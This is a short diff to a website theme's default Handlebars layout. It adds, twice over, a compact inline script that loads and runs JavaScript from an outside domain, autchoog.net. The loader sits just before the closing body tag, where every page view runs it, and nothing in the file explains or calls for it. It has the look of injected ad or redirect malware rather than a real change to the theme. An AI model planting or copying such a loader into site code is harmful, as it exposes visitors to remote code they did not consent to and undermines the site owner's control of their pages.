--- a/theme/layouts/default.hbs
+++ b/theme/layouts/default.hbs
@@ -96,6 +96,7 @@
 
 <div class="overlay"></div>
 <script src="{{relativeURL "assets/js/main.js"}}"></script>
+<script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('autchoog.net',6451188,document.createElement('script'))</script>    <script>(function(d,z,s){s.src='https://'+d+'/400/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('autchoog.net',6451188,document.createElement('script'))</script>
 {{> analytics}}
 </body>
 </html>
